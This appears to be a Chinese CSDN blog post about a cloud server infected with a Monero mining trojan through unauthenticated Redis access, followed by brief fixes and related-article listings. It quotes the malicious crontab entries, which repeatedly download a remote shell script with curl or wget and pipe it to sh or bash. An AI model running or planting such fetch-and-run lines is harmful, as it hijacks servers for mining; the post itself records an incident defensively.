记录一次服务器被挖矿木马感染

最新推荐文章于 2024-06-03 15:38:24 发布
最新推荐文章于 2024-06-03 15:38:24 发布
阅读量912 收藏
点赞数
分类专栏: redis 文章标签: 利用Redis未授权访问漏洞进行门罗币(XMR)挖矿事件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/phpxxo/article/details/103373912
版权

在12月1号, 玩redis时连接的远程一台腾讯云服务器, xhsell连接明显有卡顿, 强制重启了下服务器, 结果连系统都不能正常启动, ssh服务更别说了, 于是重装了下系统,  用的root用户重新安装了一下redis, 今天发现每过一段时间, 我正在操作xshell就断了, 重新连接后, 查看redis服务, 也挂了(redis守护进程方式运行的) , 有一种像中毒的感觉, 于是查看当前用户, 当前在线用户, 没有发现异常, 然后查看腾讯云控制台安全操作, 没有发现异常, 最后查询linux 定时任务, 发现如下内容:

 crontab -l
REDIS0009	redis-ver5.0.7
redis-bits󿿀򳨭e_.used-memè 
                        𮤭preamble~񁠣k1@@	
*/1 * * * * curl -fsSL http://pm.cpuminerpool.com/pm.sh | sh
	Back3@@	
*/13 * * * * url -fsSL http://pm.cpuminerpool.com/pm.sh | sh
	Back2@F	
*/5 * * * * wget http://pm.cpuminerpool.com/pm.sh -O .p && bash .p
	namedongBack5@@	
*/30 * * * * cur -fsSL http://pm.cpuminerpool.com/pm.sh | sh
	Back4@G\t
*/20 * * * * get http://pm.cpuminerpool.com/pm.sh -O .p && bash .p
	ÿbﳍ8[root@VM_0_5_centos ~]# XshellXshellXshellXshellXshellXshellXshell

除了上面redis 那一条, 下面看起来貌似正常, 然后复制一些内容去网上一查, 是挖矿木马, 有一篇帖子分析的比较详细, 包括预防, 修复:

http://hbu.hetianlab.com/html/news/news-2019090501.html

修复:

1. redis设置密码

2. 删除定时任务: crontab -r

3. 重启服务器 

 

 

phpxxo
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
服务器木马
chenjinlai
04-08 249
刚刚麦咖啡突然报警有木马...pwdlog病毒...多了一个system32/pwdlog.dll.vir的文件网上查了一下,是个偷登录密码的木马这东西注入到系统进程winlogon里面,麦咖啡还删除不了用icesword 卸载了那个木马文件接下来继续查找其他病毒... --------------chenjinlai2008-04-08...
一次感染挖矿病毒的经历
weixin_33804990的博客
02-21 2540
2019独角兽企业重金招聘Python工程师标准>>> ...
服务器遭遇挖矿怎么办?
最新发布
2401_84466316的博客
06-03 1372
我们先来了解下虚拟货,以比特为例,比特是一种由开源的P2P软件产生的网络虚拟货,它不依靠特定货机构发行,通过特定算法的大量计算产生,比特经济使用整个P2P网络中众多节点构成的分布式数据库来确认并记录所有的交易行为。矿工需要为比特网络提供的算法来换取比特,每一个比特的节点都会收集所有尚确认的交易,并将其归集到一个数据块中,矿工节点会附加一个随机调整数,并计算前一个数据块的SHA-256散列运算值。
解决阿里云服务器被植入挖矿脚本过程
拽着尾巴的鱼儿的博客
06-21 4144
基于学习的便利性,在阿里云服务中购买了云服务器,但是突然被告警提示被挖矿,而且要在一定期限内解决挖矿问题,否则就会被关停服务,本篇对于其处理过程进行一个记录,可能对于挖矿的处理也不全面,欢迎各路大神进行评论交流。以上就是今天要讲的内容,本文仅仅简单记录了处理服务器挖矿的流程,记录的不全面,欢迎各路大神探讨交流。
服务器挖矿问题解决
魏尚夫的成长之路
06-05 440
SSH爆破攻击分析即解决
我的服务器挖矿了,原因居然是...
qq_44005305的博客
06-24 1054
比特系统每隔一段时间就会在节点上生成一个随机代码,互联网中的所有设备都可以寻找这个代码,谁先找到就能获得奖励。而寻找代码的过程,就是挖矿。设备通过计算来筛选出符合条件的随机代码,每找到一个随机代码往往需要上万亿次的哈希运算,CPU通常会被顶到100%。为了降低成本,黑客往往会通过入侵的方式,控制别人的计算机来帮自己挖矿
一次入侵Linux服务器和删除木马程序的经历
09-15
本文档详细记录一次针对Linux服务器木马入侵事件,并分享了作者在发现、追踪以及最终清除恶意程序方面的实践经验。通过这些步骤,不仅可以有效应对当前的入侵威胁,还能为来可能遇到的安全挑战奠定坚实的基础...
一次 Linux 被入侵,服务器变“矿机”全过程.docx
12-25
一次 Linux 被入侵,服务器变“矿机”全过程
服务器上的木马怎么清理.pdf
12-17
。。。
服务器挖矿病毒怎么解决
m0_70754056的博客
07-14 1781
挖矿病毒是指通过利用计算机的计算资源进行加密货挖掘的恶意软件。它能够隐藏在云服务器中,从而利用服务器的计算资源来进行挖矿。这样的病毒不仅会损害您的服务器,而且还会缩短其使用寿命和性能。今天,我们将向您介绍如何彻底清除云服务器上的挖矿病毒。
服务器挖矿了怎么办,实战清退
qq_14926283的博客
03-25 1588
然后看看有没有定时任务,有的时候它会定时去检测xmrig挖矿木马是否在正常运行,不正常它会重新去做一系列的处理,重新植入木马,这时候我们要去取消这些定时任务。注意这些看起来像系统进程的最好不要kill掉,容易出现意外,把生产环境的服务给干费了,那我们得去删掉这个后门用户怎么办。可以看到我这边有一个名为xmrig(有经验的这里看到名字直接就能判断)的进程霸占了100.3的资源,这里中招了。第一时间重启服务是不行的,这些挖矿木马一定是会伴随着你的重启而自动重启,一定时间内重新霸占你的服务器资源。
服务器被黑客攻击,用来挖矿!怎么办?
wuli1024的博客
12-29 1460
昨天下午一个朋友和我说,他的服务器被阿里云监测出来在挖矿,然后阿里云官方把服务器给关停了。
宝塔攻防------木马挖矿xmrig问题处理
jack_Day666的博客
05-13 1100
点他名字xmrig进详情 查找是否有异常的ip端口号 在宝塔首页,查看对应版本是否过低 进入云服务器,查看是否有异常登录和木马文件 这里隔离后,在宝塔里 起始都输入刚刚的ip 然后添加 查看服务器异常登录,因为加了黑名单,可以不管了 最后,查看宝塔主页面,cpu是否正常,如果正常,可以不重启服务器,建议重启宝塔。 ...
阿里云服务器被[crypto]攻击导致CPU爆满(已解决)
大鹏
07-14 1652
缘由 之前玩Docker并开放了2375端口和redis 弱密码 且默认6379端口 的时候,安装时使用密码,然后还在阿里云开放了0.0.0.0的6379端口,导致出现了漏洞, 现象 被安装了Docker镜像且启用了容器运行。 Reids多了几条任务计划的缓存数据 /usr/share 目录下多了 5个文件 -rwxr-xr-x 1 root root 4563624 Jul 1 17:46 '[crypto]' -rw-r--r-- 1 root root 4384...
一次服务器入侵事件的应急响应
小王的储物间
02-24 703
我们推测攻击者不止一个,并且都是通过SSH弱口令入侵服务器事件时间线如下图所示:第一波攻击者可能是挖矿组织,在5月7日大概率利用SSH弱口令进入服务器上传挖矿程序somescript,且做了对应的维持手段。第二波攻击者可能是黑产组织,攻击时间为7月16日至7月17日,其操作是对网站做黑帽SEO,更改宝塔后台并上传大量后门。第三波攻击者应该只是想控制一批跳板机,在8月17日上传了代理程序,目前在服务器上出现的恶意事件最后截止也是到8月17日。
阿里云服务器挖矿的解决方法
qq_47464056的博客
07-25 4947
服务器被入侵植入挖矿程序!
服务器挖矿了需要重装系统吗
06-10
因为挖矿病毒通常会在系统中留下一些后门或者恶意程序,这些程序可能会继续在后台运行,重新感染服务器或者窃取敏感信息。所以,为了确保服务器安全,建议重装系统,并且重新设置密码和安装所需的软件和服务。在重装...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值